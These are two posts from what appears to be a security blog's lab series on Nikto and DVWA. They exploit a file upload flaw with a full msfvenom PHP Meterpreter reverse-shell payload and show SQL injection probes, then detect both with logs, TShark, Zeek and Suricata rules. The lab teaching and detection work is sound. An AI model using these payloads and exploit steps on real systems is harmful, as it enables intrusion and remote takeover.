Tuesday, December 12, 2023

Beginning Nikto - File Upload Vulnerability testing

This post is part of the series of learning more about Nikto and web application scanning from the perspectives of both the hack and its detection

From the hacking perspective, Nikto is the tool used. From detection perspective, the tools and or processed used for the network forensics are log analysis, TShark, Zeek and Suricata. 


The Hack - Beginning Nikto - File Upload Vulnerability testing

Trying a different scan by providing the entire URL

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_0]
└─$ nikto -host http://10.0.0.106/dvwa/vulnerabilities/upload/ -ipv4 -Display 1 --ask no - -nossl -no404 -Tuning 0

Nothing much changed from what you saw in the earlier posts. Manually performing the exploit.

In this case, I'm transitioning to the manual exploitation of the file Upload vulnerability.

Visit the file upload page within DVWA.














Open the browser "Web Developer Tools" and select the "Network" tab. 

Upload the file via the web application and we see the file successfully uploaded.








The upload also confirms the location the file was uploaded to "./../hackable/uploads/hack_and_detect.png succesfully uploaded!". This looks like two directories down from the current directory.

Revisiting the "Web Developer Tools", extracting a few lines of interest. First from the request:

Headers tab:
	** 
	scheme: http
	host: 10.0.0.106
	filename: /dvwa/vulnerabilities/upload/


Request tab:
	-----------------------------12554550258851086011705289877
	Content-Disposition: form-data; name="MAX_FILE_SIZE"

	100000
	-----------------------------12554550258851086011705289877
	Content-Disposition: form-data; name="uploaded"; filename="hack_and_detect.png"
	Content-Type: image/png

	‰PNG
	
	...
	0çJ3ÄÉæ}›6œý×
	...
	-----------------------------12554550258851086011705289877
	Content-Disposition: form-data; name="Upload"

	Upload
	-----------------------------12554550258851086011705289877--


Looking at "Response" tab:

../../hackable/uploads/hack_and_detect.png succesfully uploaded!

With this in place, can we use curl to get this file?

┌──(kali㉿securitynik)-[~/file_upload]
└─$ curl --request GET "http://10.0.0.106/dvwa/hackable/uploads/hack_and_detect.png" --output /tmp/hack_and_detect.png
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 64493  100 64493    0     0  7641k      0 --:--:-- --:--:-- --:--:-- 7872k

Verify the file was downloaded and its size:

┌──(kali㉿securitynik)-[~/file_upload]
└─$ ls /tmp/hack_and_detect.png  -l
-rw-r--r-- 1 kali kali 64493 Jun 22 15:25 /tmp/hack_and_detect.png

Open the file with "feh"




















With confirmation that the file is in place, this means we may be able to upload other files.

Leveraging msfvenom to create a malicious PHP file.

┌──(kali㉿securitynik)-[/tmp]
└─$ msfvenom --payload php/meterpreter/reverse_tcp LHOST=10.0.0.108 LPORT=9999 --format raw --out malicious.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 1111 bytes
Saved as: malicious.php

View the created code

┌──(kali㉿securitynik)-[/tmp]
└─$ cat malicious.php 
/*<?php /**/ error_reporting(0); $ip = '10.0.0.108'; $port = 9999; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();

Upload the malicious .php file, using the same process we did for the other files.

Setup a resource file using the multi-handler to load with msfconsole.

┌──(kali㉿securitynik)-[~]
└─$ cat dvwa.rc 
#File Upload Vulnerability
use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 10.0.0.108
set LPORT 9999
exploit

Load up the resource file with msfconsole

┌──(kali㉿securitynik)-[~]
└─$ msfconsole --quiet --resource dvwa.rc 
[*] Processing dvwa.rc for ERB directives.
resource (dvwa.rc)> use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
resource (dvwa.rc)> set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
resource (dvwa.rc)> set LHOST 10.0.0.108
LHOST => 10.0.0.108
resource (dvwa.rc)> set LPORT 9999
LPORT => 9999
resource (dvwa.rc)> exploit
[*] Started reverse TCP handler on 10.0.0.108:9999

Use curl to access the malicious.php file.

┌──(kali㉿securitynik)-[~]
└─$ curl --request GET http://10.0.0.106/dvwa/hackable/uploads/malicious.php

At this point, curl hangs and the MSF handler opens a session.

[*] Sending stage (39927 bytes) to 10.0.0.106
[*] Meterpreter session 1 opened (10.0.0.108:9999 -> 10.0.0.106:49786) at 2023-06-22 15:29:04 -0400

Validate we have successfully gained access to the system.

meterpreter > sysinfo 
Computer    : NIK-WIN-10
OS          : Windows NT NIK-WIN-10 10.0 build 19044 (Windows 10) AMD64
Meterpreter : php/windows

While we can do more, there is no need for this at this point. Objective achieved!

Exit Meterpreter:

meterpreter > exit -j
[*] Shutting down Meterpreter...

Transitioning to log analysis.

Detect - Log Analysis

Looking at the HTTP access.log file, there is nothing standing out here. Realistically, the only question to be asked here is if files should have been able to access from "/dvwa/hackable/uploads". Other than that, there is nothing here that stands out to me to suggest there was a problem.

10.0.0.108 - - [22/Jun/2023:15:23:33 -0400] "POST /dvwa/vulnerabilities/upload/ HTTP/1.1" 200 4061 "http://10.0.0.106/dvwa/vulnerabilities/upload/" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
10.0.0.108 - - [22/Jun/2023:15:24:42 -0400] "GET /dvwa//hackable/uploads/hack_and_detect.png HTTP/1.1" 200 64493 "-" "curl/7.88.1"
10.0.0.108 - - [22/Jun/2023:15:26:45 -0400] "POST /dvwa/vulnerabilities/upload/ HTTP/1.1" 200 4055 "http://10.0.0.106/dvwa/vulnerabilities/upload/" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
10.0.0.108 - - [22/Jun/2023:15:28:29 -0400] "GET /dvwa/hackable/uploads/malicious.php HTTP/1.1" 200 2 "-" "curl/7.88.1"

Transitioning to packet analysis

Detect - Packet Analysis

Setup for packet analysis. Capture packets on ports 80,443 or 9999

┌──(kali㉿securitynik)-[~/file_upload]
└─$ tshark -n -w ./file_upload.pcap -f 'tcp port(80 or 443 or 9999)' --interface eth0                                           
Capturing on 'eth0'
 ** (tshark:213735) 14:10:39.726904 [Main MESSAGE] -- Capture started.
 ** (tshark:213735) 14:10:39.726964 [Main MESSAGE] -- File: "./file_upload.pcap"

Analyzing the PCAP. No noeed to go through the entire process. We've done a lot of the heavy lifting in the earlier posts. Hence building on what was done before.

How many unique streams/sessions do we have in this PCAP.

┌──(kali㉿securitynik)-[~/file_upload]
└─$ tshark -n -r file_upload.pcap -T fields -e tcp.stream | sort --unique | wc --lines
5

With 5 streams, we should be able to quickly analyze these. Starting with stream 0.

Looking at the first 30 lines of the reassembled TCP stream.

┌──(kali㉿securitynik)-[~/file_upload]
└─$ tshark -n -r file_upload.pcap -q -z follow,tcp,ascii,0 | head --lines=30

===================================================================
Follow: tcp,ascii
Filter: tcp.stream eq 0
Node 0: 10.0.0.108:55686
Node 1: 10.0.0.106:80
1460
POST /dvwa/vulnerabilities/upload/ HTTP/1.1
Host: 10.0.0.106
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------40506030756611040921021496595
Content-Length: 64966
Origin: http://10.0.0.106
Connection: keep-alive
Referer: http://10.0.0.106/dvwa/vulnerabilities/upload/
Cookie: security=low; PHPSESSID=i16a2p6b95up7nrnbi3foov7bf
Upgrade-Insecure-Requests: 1

-----------------------------40506030756611040921021496595
Content-Disposition: form-data; name="MAX_FILE_SIZE"

100000
-----------------------------40506030756611040921021496595
Content-Disposition: form-data; name="uploaded"; filename="hack_and_detect.png"
Content-Type: image/png

.PNG

We see above, the file which was uploaded have a name of "hack_and_detect.png" and it's a .PNG image file as can be seen from "Content-Type: image/png".

Was this file upload successful? Looking for any report of the file name being successfully uploaded.

┌──(kali㉿securitynik)-[~/file_upload]
└─$ tshark -n -r file_upload.pcap -q -z follow,tcp,ascii,0 | grep "hack_and_detect"
Content-Disposition: form-data; name="uploaded"; filename="hack_and_detect.png"
..<pre>../../hackable/uploads/hack_and_detect.png succesfully uploaded!</pre>

Let's see what is in stream 1.

┌──(kali㉿securitynik)-[~/file_upload]
└─$ tshark -n -r file_upload.pcap -q -z follow,tcp,ascii,1 | head --lines=25

===================================================================
Follow: tcp,ascii
Filter: tcp.stream eq 1
Node 0: 10.0.0.108:55814
Node 1: 10.0.0.106:80
116
GET /dvwa//hackable/uploads/hack_and_detect.png HTTP/1.1
Host: 10.0.0.106
User-Agent: curl/7.88.1
Accept: */*


        1460
HTTP/1.1 200 OK
Date: Thu, 22 Jun 2023 19:24:42 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
Last-Modified: Thu, 22 Jun 2023 19:23:33 GMT
ETag: "fbed-5febcd1f850e8"
Accept-Ranges: bytes
Content-Length: 64493
Content-Type: image/png

.PNG

Above looks like a request was made for the same image, which was previously uploaded.

Looking at stream 2

┌──(kali㉿securitynik)-[~/file_upload]
└─$ tshark -n -r file_upload.pcap -q -z follow,tcp,ascii,2 | head --lines=33

===================================================================
Follow: tcp,ascii
Filter: tcp.stream eq 2
Node 0: 10.0.0.108:47986
Node 1: 10.0.0.106:80
1460
POST /dvwa/vulnerabilities/upload/ HTTP/1.1
Host: 10.0.0.106
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------3215483674970812347988844840
Content-Length: 1582
Origin: http://10.0.0.106
Connection: keep-alive
Referer: http://10.0.0.106/dvwa/vulnerabilities/upload/
Cookie: security=low; PHPSESSID=i16a2p6b95up7nrnbi3foov7bf
Upgrade-Insecure-Requests: 1

-----------------------------3215483674970812347988844840
Content-Disposition: form-data; name="MAX_FILE_SIZE"

100000
-----------------------------3215483674970812347988844840
Content-Disposition: form-data; name="uploaded"; filename="malicious.php"
Content-Type: application/x-php

/*<?php /**/ error_reporting(0); $ip = '10.0.0.108'; $port = 9999; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_ty
752
pe) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();
-----------------------------3215483674970812347988844840

There we see a php file was uploaded. Was the upload successful?

┌──(kali㉿securitynik)-[~/file_upload]
└─$ tshark -n -r file_upload.pcap -q -z follow,tcp,ascii,2 | grep "malicious.php"
Content-Disposition: form-data; name="uploaded"; filename="malicious.php"
..<pre>../../hackable/uploads/malicious.php succesfully uploaded!</pre>

Yes it was. Moving on to stream 3.

┌──(kali㉿securitynik)-[~/file_upload]
└─$ tshark -n -r file_upload.pcap -q -z follow,tcp,ascii,3 

===================================================================
Follow: tcp,ascii
Filter: tcp.stream eq 3
Node 0: 10.0.0.108:33048
Node 1: 10.0.0.106:80
109
GET /dvwa/hackable/uploads/malicious.php HTTP/1.1
Host: 10.0.0.106
User-Agent: curl/7.88.1
Accept: */*


        214
HTTP/1.1 200 OK
Date: Thu, 22 Jun 2023 19:28:29 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
X-Powered-By: PHP/8.0.28
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

2
/*

        5
0


===================================================================

Stream 3 seems to be just the request for the malicious.php file using curl but not much details in side the response. Very interesting.

Looking at stream 4.

┌──(kali㉿securitynik)-[~/file_upload]
└─$ tshark -n -r file_upload.pcap -q -z follow,tcp,ascii,4 | more                                                                    

===================================================================
Follow: tcp,ascii
Filter: tcp.stream eq 4
Node 0: 10.0.0.106:49786
Node 1: 10.0.0.108:9999
        4
....
        1460
/*<?php /**/





if (!isset($GLOBALS['channels'])) {
  $GLOBALS['channels'] = array();
}
....

We see something here to do with .php. Looking further in the payload we ultimately see.

┌──(kali㉿securitynik)-[~/file_upload]
└─$ tshark -n -r file_upload.pcap -q -z follow,tcp,ascii,4 | grep meter
my_print("Evaling main meterpreter stage");

That's a big clue that we have a real problem here on port 9999.

At this point, we know there are a number of files within these HTTP sessions. Fortunately, TShark can extract content from HTTP so we don't have to manually attempt to carve any of these. Let's extract those files with TShark.

Looking at the help, we see the TShark --export-objects usage.

┌──(kali㉿securitynik)-[~/file_upload]
└─$ tshark --export-objects --help 
tshark: "--export-objects" are specified as: <protocol>,<destdir>
tshark: The available export object types for the "--export-objects" option are:
     dicom
     ftp-data
     http
     imf
     smb
     tftp

Exporting from HTTP.

┌──(kali㉿securitynik)-[~/file_upload]
└─$ tshark -n -r file_upload.pcap -q --export-objects http,./exported-contents/

Looking at the exported contents we see:

┌──(kali㉿securitynik)-[~/file_upload]
└─$ ls -l exported-contents/
total 144
-rw-r--r-- 1 kali kali 64493 Jun 23 08:31  hack_and_detect.png
-rw-r--r-- 1 kali kali     2 Jun 23 08:31  malicious.php
-rw-r--r-- 1 kali kali 64966 Jun 23 08:31  upload
-rw-r--r-- 1 kali kali  4061 Jun 23 08:31 'upload(1)'
-rw-r--r-- 1 kali kali  1582 Jun 23 08:31 'upload(2)'
-rw-r--r-- 1 kali kali  4055 Jun 23 08:31 'upload(3)'

Confirming the files using the file command.

┌──(kali㉿securitynik)-[~/file_upload]
└─$ file exported-contents/*
exported-contents/hack_and_detect.png: PNG image data, 178 x 127, 8-bit/color RGBA, non-interlaced
exported-contents/malicious.php:       ASCII text, with no line terminators
exported-contents/upload:              data
exported-contents/upload(1):           HTML document, ASCII text, with very long lines (472), with CRLF, LF line terminators
exported-contents/upload(2):           ASCII text, with very long lines (1111), with CRLF line terminators
exported-contents/upload(3):           HTML document, ASCII text, with very long lines (472), with CRLF, LF line terminators

At this point, you can analyze the file as needed. I will transition to Zeek to see what is saw.

Detect - Zeek Analysis

Setup Zeek

┌──(kali㉿securitynik)-[~/nikto_stuff/zeek_stuff]
└─$ sudo zeek --iface any --no-checksums

Focusing on the indicators of compromise, "hack_and_detect.png" and "malicious.php". First "hack_and_detect.png"

└─$ cat http.log | grep --perl-regexp "hack_and_detect"                                                                              
1687461839.117382       CcgONKdzshQp8ZH68       10.0.0.108      55686   10.0.0.106      80      1       POST    10.0.0.106      /dvwa/vulnerabilities/upload/        http://10.0.0.106/dvwa/vulnerabilities/upload/  1.1     Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0       http://10.0.0.106       64966   4061    200     OK      -       -       (empty) -       -       -   F8D5nXnU24QCFs3ni,FL8pyG3KgVYBxGp5J8,FjahXg2bW4MO7TWJok  hack_and_detect.png     image/png       Fr5Uwyf1md9rma0F1       -       text/html
1687461900.287690       Ca15Kb1F57kcgJCx8j      10.0.0.108      55814   10.0.0.106      80      1       GET     10.0.0.106      /dvwa//hackable/uploads/hack_and_detect.png  -       1.1     curl/7.88.1     -       0       64493   200     OK      -       -       (empty)      -       -       -       -       -       -       FRXytH1roWzznSMp5d      -       image/png

Looking at malicious.php.

┌──(kali㉿securitynik)-[~/file_upload]                                                                                  
└─$ cat http.log | grep --perl-regexp "malicious.php"
1687462020.720561       C9k6p6FxgHAgjfjGa       10.0.0.108      47986   10.0.0.106      80      1       POST    10.0.0.106      /dvwa/vulnerabilities/upload/   http://10.0.0.106/dvwa/vulnerabilities/upload/    1.1     Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0  http://10.0.0.106       1582    4055    200     OK      -       -       (empty) -       -       -       FbKoDB2gXDz6wz2Z74,F3m3sc1e7ZmJMAs5Cc,FVC9nG4cwHcT19LmOa  malicious.php   text/x-php      Fnwwck3gnEGZ79OWy1      -       text/html
1687462143.814819       CwNOXb1eZ6LvtPEI96      10.0.0.108      33048   10.0.0.106      80      1       GET     10.0.0.106      /dvwa/hackable/uploads/malicious.php    -       1.1     curl/7.88.1     -02       200     OK      -       -       (empty) -       -       -       -       -       -       FVkDFy3Q20vdj9aPCk      -       -

Looking across the various logs for the UID "C9k6p6FxgHAgjfjGa" and removing the files with 0 bytes, we get

┌──(kali㉿securitynik)-[~/file_upload]
└─$ grep "C9k6p6FxgHAgjfjGa" *.log | grep --perl-regexp "1111|4055"                                                                                                                                                                                                                                       
files.log:1687462020.720573     F3m3sc1e7ZmJMAs5Cc      C9k6p6FxgHAgjfjGa       10.0.0.108      47986   10.0.0.106      80      HTTP    0       (empty) text/x-php      malicious.php   0.000000        -       T       1111    -       0       0       F       -       -       -       -       -       --
files.log:1687462020.751930     Fnwwck3gnEGZ79OWy1      C9k6p6FxgHAgjfjGa       10.0.0.108      47986   10.0.0.106      80      HTTP    0       (empty) text/html       -       0.000001        -       F       4055    4055    0       0       F       -       -       -       -       -       -       -
http.log:1687462020.720561      C9k6p6FxgHAgjfjGa       10.0.0.108      47986   10.0.0.106      80      1       POST    10.0.0.106      /dvwa/vulnerabilities/upload/   http://10.0.0.106/dvwa/vulnerabilities/upload/  1.1     Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0  http://10.0.0.106 1582    4055    200     OK      -       -       (empty) -       -       -       FbKoDB2gXDz6wz2Z74,F3m3sc1e7ZmJMAs5Cc,FVC9nG4cwHcT19LmOa        malicious.php   text/x-php      Fnwwck3gnEGZ79OWy1      -       text/html

Obviously, there are entries in the conn.log file. However, the objective is to keep things simple for this analysis.

Moving on the the IDS/IPS.

Detect - Suricata (IDS) Analysis

Setup Suricata to operate in IDS mode

┌──(kali㉿securitynik)-[/var/log/suricata]
└─$ sudo suricata -c /etc/suricata/suricata.yaml -s /var/lib/suricata/rules/suricata.rules -i eth0 -l /var/log/suricata/ --simulate-ips -k all

How many alerts triggered for this activity?

┌──(kali㉿securitynik)-[/var/log/suricata]                                                                              └─$ cat fast.log | grep --perl-regexp '\[\*\*\].*?\[\**\]' --only-matching | wc --lines
1

Hmmm! One alert! Interesting!!

┌──(kali㉿securitynik)-[/var/log/suricata]
└─$ cat fast.log 
06/22/2023-15:27:00.720561  [**] [1:2011768:8] ET WEB_SERVER PHP tags in HTTP POST [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 10.0.0.108:47986 -> 10.0.0.106:80

Looking at the alert-debug.log file

┌──(kali㉿securitynik)-[/var/log/suricata]
└─$ cat alert-debug.log | more                                                                                                                      
+================
TIME:              06/22/2023-15:27:00.720561
PKT SRC:           wire/pcap
SRC IP:            10.0.0.108
DST IP:            10.0.0.106
PROTO:             6
SRC PORT:          47986
DST PORT:          80
TCP SEQ:           2986100032
TCP ACK:           2432827111
FLOW:              to_server: TRUE, to_client: FALSE
FLOW Start TS:     06/22/2023-15:27:00.719233
FLOW PKTS TODST:   3
FLOW PKTS TOSRC:   1
FLOW Total Bytes:  1708
FLOW IPONLY SET:   TOSERVER: TRUE, TOCLIENT: TRUE
FLOW ACTION:       DROP: FALSE
FLOW NOINSPECTION: PACKET: FALSE, PAYLOAD: FALSE, APP_LAYER: FALSE
FLOW APP_LAYER:    DETECTED: TRUE, PROTO 1
PACKET LEN:        1514
PACKET:
...

We can see that this ties in above with the other network based traffic, especially when we focus on TCP port 47986.

Peeking a bit more into this php traffic.

┌──(kali㉿securitynik)-[/var/log/suricata]
└─$ cat alert-debug.log | grep ".php"
 03C0  63 61 74 69 6F 6E 2F 78  2D 70 68 70 0D 0A 0D 0A   cation/x -php....
 03D0  2F 2A 3C 3F 70 68 70 20  2F 2A 2A 2F 20 65 72 72   /*<?php  /**/ err
 0370  2E 70 68 70 22 0D 0A 43  6F 6E 74 65 6E 74 2D 54   .php"..C ontent-T
 0390  2F 78 2D 70 68 70 0D 0A  0D 0A 2F 2A 3C 3F 70 68   /x-php.. ../*<?ph
 0370  2E 70 68 70 22 0D 0A 43  6F 6E 74 65 6E 74 2D 54   .php"..C ontent-T
 0390  2F 78 2D 70 68 70 0D 0A  0D 0A 2F 2A 3C 3F 70 68   /x-php.. ../*<?ph

Well I'm going to close off for now.

Hope you enjoyed the posts in this series:


References:

Posted by at No comments:
Labels: , , , , , , ,

Beginning Nikto - SQL Injection with default evasion

This post is part of the series of learning more about Nikto and web application scanning from the perspectives of both the hack and its detection

From the hacking perspective, Nikto is the tool used. From detection perspective, the tools and or processed used for the network forensics are log analysis, TShark, Zeek and Suricata.

The Hack - SQL Injection with default evasion.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_9]
└─$ nikto -host http://10.0.0.106 -ipv4 -Display 1 --ask no -nossl -no404 -Tuning 9
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          10.0.0.106
+ Target Hostname:    10.0.0.106
+ Target Port:        80
+ Start Time:         2023-06-09 14:09:20 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
+ /cgi.cgi/: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /cgi.cgi/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /: Retrieved x-powered-by header: PHP/8.0.28.
+ PHP/8.0.28 appears to be outdated (current is at least 8.1.5), PHP 7.4.28 for the 7.4 branch.
+ OpenSSL/1.1.1t appears to be outdated (current is at least 3.0.7). OpenSSL 1.1.1s is current for the 1.x branch and will be supported until Nov 11 2023.
+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing
+ /index.php?module=My_eGallery&do=showpic&pid=-1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat(0x3C7230783E,pn_uname,0x3a,pn_pass,0x3C7230783E),0,0,0/**/FROM/**/md_users/**/WHERE/**/pn_uid=$id/* - Redirects (302) to http://10.0.0.106/dashboard/ , My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection.
....
/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(select%201%20FROM(select%20count(*),concat((select%20(select%20concat(session_id))%20FROM%20jml_session%20LIMIT%200,1),floor(rand(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a) - Redirects (302) to http://10.0.0.106/dashboard/ , Joomla is vulnerable to a SQL injection which can lead to administrator access. https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/?page=1&year=0&month=0
+ 783 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time:           2023-06-09 14:09:22 (GMT-4) (2 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
 
Once again, index.php does not have most of the parameters that Nikto is reporting as vulnerable. What do I make of the output from the tool. I make that it is time for me to move on.

See here for more guidance on SQL Injection:  or 
Learning by practicing: Beginning Web Application Testing: SQL Injection - Mutillidae (securitynik.com)
Learning by practicing: Continuing SQL Injection with SQLMap - Exploitation (securitynik.com)


Detect - Log Analysis

Quick log analysis says most of this activity is a waste of time. First most of the parameters targeted here does not exist on index.php page. We know this from the previous posts in this series. Second their is no request.php file.

I've lost interest. Maybe need to do the test from another perspective.

See this link for for assistance with detecting SQL injection in your infrastructure.


Detect - Suricata (IDS) Analysis

Setup Suricata to operate in IDS mode

┌──(kali㉿securitynik)-[/var/log/suricata]
└─$ sudo suricata -c /etc/suricata/suricata.yaml -s /var/lib/suricata/rules/suricata.rules -i eth0 -l /var/log/suricata/ --simulate-ips -k all

What does the IDS see

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_9]
└─$ cat fast.log | cut --fields=3 --delimiter='[' | sort | uniq --count | sort --numeric-sort --reverse | head --lines=5
     35 1:2022028:2] ET WEB_SERVER Possible CVE-2014-6271 Attempt 
     14 1:2021390:3] ET WEB_SPECIFIC_APPS WEB-PHP RCE PHPBB 2004-1315 
      6 1:2006445:14] ET WEB_SERVER Possible SQL Injection Attempt SELECT FROM 
      5 1:2006446:14] ET WEB_SERVER Possible SQL Injection Attempt UNION SELECT 
      4 1:2011042:6] ET WEB_SERVER MYSQL SELECT CONCAT SQL Injection Attempt


See 3 unique alerts for SQL injection attempt. Find the associated rules:

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_9]
└─$ grep --perl-regexp "2006445|2006446|2011042" /var/lib/suricata/rules/suricata.rules 
alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER Possible SQL Injection Attempt SELECT FROM"; flow:established,to_server; http.uri; content:"SELECT"; nocase; content:"FROM"; nocase; distance:0; reference:url,en.wikipedia.org/wiki/SQL_injection; reference:url,doc.emergingthreats.net/2006445; classtype:web-application-attack; sid:2006445; rev:14; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, signature_severity Major, tag SQL_Injection, updated_at 2020_05_01;)

alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER Possible SQL Injection Attempt UNION SELECT"; flow:established,to_server; http.uri; content:"UNION"; nocase; content:"SELECT"; nocase; distance:0; reference:url,en.wikipedia.org/wiki/SQL_injection; reference:url,doc.emergingthreats.net/2006446; classtype:web-application-attack; sid:2006446; rev:14; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, signature_severity Major, tag SQL_Injection, updated_at 2020_09_01;)

alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER MYSQL SELECT CONCAT SQL Injection Attempt"; flow:established,to_server; http.uri; content:"SELECT"; nocase; content:"CONCAT"; nocase; pcre:"/SELECT.+CONCAT/i"; reference:url,ferruh.mavituna.com/sql-injection-cheatsheet-oku/; reference:url,www.webdevelopersnotes.com/tutorials/sql/a_little_more_on_the_mysql_select_statement.php3; reference:url,doc.emergingthreats.net/2011042; classtype:web-application-attack; sid:2011042; rev:6; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, signature_severity Major, tag SQL_Injection, updated_at 2020_09_14;)

Find an alert for "2006445"

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_9]
└─$ less alert-debug.log

ALERT CNT:           2
ALERT MSG [00]:      ET WEB_SERVER Possible SQL Injection Attempt SELECT FROM
ALERT GID [00]:      1
ALERT SID [00]:      2006445
ALERT REV [00]:      14
ALERT CLASS [00]:    Web Application Attack
ALERT PRIO [00]:     1
ALERT FOUND IN [00]: STATE
ALERT IN TX [00]:    34
PAYLOAD LEN:         316
PAYLOAD:
 0000  47 45 54 20 2F 73 69 74  65 2F 27 25 32 30 55 4E   GET /sit e/'%20UN
 0010  49 4F 4E 25 32 30 41 4C  4C 25 32 30 53 45 4C 45   ION%20AL L%20SELE
 0020  43 54 25 32 30 46 69 6C  65 54 6F 43 6C 6F 62 28   CT%20Fil eToClob(
 0030  27 2F 65 74 63 2F 70 61  73 73 77 64 27 2C 27 73   '/etc/pa sswd','s
 0040  65 72 76 65 72 27 29 3A  3A 68 74 6D 6C 2C 30 25   erver'): :html,0%
 0050  32 30 46 52 4F 4D 25 32  30 73 79 73 75 73 65 72   20FROM%2 0sysuser
 0060  73 25 32 30 57 48 45 52  45 25 32 30 75 73 65 72   s%20WHER E%20user
 0070  6E 61 6D 65 3D 55 53 45  52 25 32 30 2D 2D 2F 2E   name=USE R%20--/.
 0080  68 74 6D 6C 20 48 54 54  50 2F 31 2E 31 0D 0A 55   html HTT P/1.1..U
 0090  73 65 72 2D 41 67 65 6E  74 3A 20 4D 6F 7A 69 6C   ser-Agen t: Mozil
 00A0  6C 61 2F 35 2E 30 20 28  57 69 6E 64 6F 77 73 20   la/5.0 ( Windows 
